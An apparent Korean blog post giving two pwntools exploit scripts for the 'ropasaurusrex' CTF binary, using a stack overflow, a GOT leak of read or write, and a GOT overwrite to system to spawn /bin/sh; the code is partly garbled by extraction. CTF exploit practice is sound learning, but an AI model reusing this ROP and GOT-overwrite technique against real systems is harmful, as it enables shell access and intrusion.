ropasaurusrex


[*] read leak Exploit


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
from pwn import *
 
= process('./ropasaurusrex')
= ELF('./ropasaurusrex')
= ROP(e)
 
pop3ret = 0x80484b6
read_plt = e.plt['read']
read_got = e.got['read']
write_plt = e.plt['write']
write_got = e.got['write']
read_system_offset = 0x9ad60 # read - system
bss = e.bss()
 
payload = 'A'*140 # buf + sfp -> ret
r.read(0,bss,8# /bin/sh\x00 
r.write(1,read_got,4# leak
r.read(0,read_got,4# system
r.raw(read_plt) # read_plt execute -> .got -> system
r.raw('AAAA'# dummy
r.raw(bss) # /bin/sh
payload += str(r)
 
p.send(payload)
p.send('/bin/sh\x00')
 
sleep(1)
 
read = u32(p.recv())
system = read - read_system_offset
 
p.send(p32(system))
 
p.interactive()
cs



[*] write leak Exploit



1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
from pwn import *
 
= ELF('./ropasaurusrex')
# lib = ELF('/lib/x86_64-linux-gnu/libc.so.6')
= ROP(e)
= process('./ropasaurusrex')
#ibrop = ROP("/lib/x86_64-linux-gnu/libc.so.6",checksec=False)
 
pop3ret = 0x80484b6
read_plt = e.plt['read']
write_plt = e.plt['write']
read_got = e.got['read']
write_got = e.got['write']
write_system_offset = 0x9add0 # write - system
bss = e.bss()
 
payload = 'A'*140
r.read(0,bss,8# /bin/sh -> bss
r.write(1,write_got,4# write leak
r.read(0,write_got,4# write_got -> system
r.raw(write_plt) # system
r.raw('AAAA'# dummy
r.raw(bss) # /bin/sh
payload += str(r)
 
p.send(payload)
p.send('/bin/sh\x00')
 
sleep(1)
 
write = u32(p.recv())
system = write - write_system_offset
 
p.send(p32(system))
 
p.interactive()
cs


저작자표시 비영리

'Hacking' 카테고리의 다른 글

SQLI 정리  (0) 2019.11.12
LFI Vuln  (0) 2019.11.11
ARM Reversing  (0) 2019.08.04
IDA PRO 테마 적용  (0) 2018.12.27
메모리 보호기법 해제  (0) 2018.12.19

+ Recent posts

티스토리툴바